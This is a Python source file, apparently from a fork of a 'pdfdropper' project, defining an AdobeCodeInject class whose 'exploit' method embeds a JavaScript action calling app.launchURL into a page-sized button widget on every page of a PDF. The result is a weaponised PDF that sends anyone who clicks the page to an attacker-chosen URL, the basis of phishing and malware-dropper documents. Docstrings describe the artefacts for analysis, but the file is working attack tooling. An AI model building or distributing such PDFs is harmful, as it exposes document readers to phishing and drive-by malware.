forked from 0x6rss/pdfdropper
adobecodeinject.py
from core import *
from core.imp import *
class AdobeCodeInject:
    """Attach a URL-launching JavaScript action to every page of a PDF.

    For each page, ``exploit`` adds a ``/Widget`` annotation sized to the
    page's box. The annotation's ``/A`` entry references a ``/JavaScript``
    action whose script calls ``app.launchURL`` with ``target_url``.

    For analysis: a document produced by this class carries a ``/JavaScript``
    action dictionary with an ``app.launchURL`` call in ``/JS``, referenced
    from a page-sized ``/Widget`` annotation titled "Open URL" on every page.
    """

    def __init__(self, target_url: str) -> None:
        """Remember the URL that the embedded script hands to app.launchURL."""
        self.target_url = target_url

    def _make_action(self) -> DictionaryObject:
        """Return the action dictionary (/S /JavaScript) holding the script."""
        # NOTE(review): target_url is placed inside a single-quoted JavaScript
        # string literal with no escaping, so the script is only as well-formed
        # as the URL it is given.
        script = f"""
try {{
app.launchURL('{self.target_url}', true);
}} catch (e) {{
app.alert('Error: ' + e.message);
}}
"""
        action_entries = {
            NameObject("/S"): NameObject("/JavaScript"),
            NameObject("/JS"): TextStringObject(script),
        }
        return DictionaryObject(action_entries)

    def _make_annot(self, rect: RectangleObject, action: IndirectObject) -> DictionaryObject:
        """Return a button-field widget annotation over ``rect`` bound to ``action``.

        ``rect`` becomes the annotation's /Rect and ``action`` its /A entry.
        """
        return DictionaryObject({
            NameObject("/Type"): NameObject("/Annot"),
            NameObject("/Subtype"): NameObject("/Widget"),
            NameObject("/Rect"): rect,
            NameObject("/FT"): NameObject("/Btn"),
            NameObject("/T"): TextStringObject("Open URL"),
            # Field flags value 4; presumably bit 3 of the common field flags
            # (NoExport) - confirm against the PDF specification.
            NameObject("/Ff"): NumberObject(4),
            NameObject("/A"): action,
        })

    def exploit(self, pdf: Pdf):
        """Add one page-sized widget annotation with the script action per page.

        The action dictionary is built once; it is registered through
        ``pdf.add_object`` again for every page, and the returned reference is
        what each annotation points at.
        """
        action = self._make_action()
        for page in pdf.pages:
            # Box preference: artbox, then mediabox, then bleedbox. The first
            # one that is a RectangleObject wins; bleedbox is used unchecked.
            box = page.artbox
            for fallback in ("mediabox", "bleedbox"):
                if isinstance(box, RectangleObject):
                    break
                box = getattr(page, fallback)
            print(f"{page.page_number} use arct: {box}")
            action_ref = pdf.add_object(action)
            widget = self._make_annot(box, action_ref)
            pdf.add_annotation(page, widget)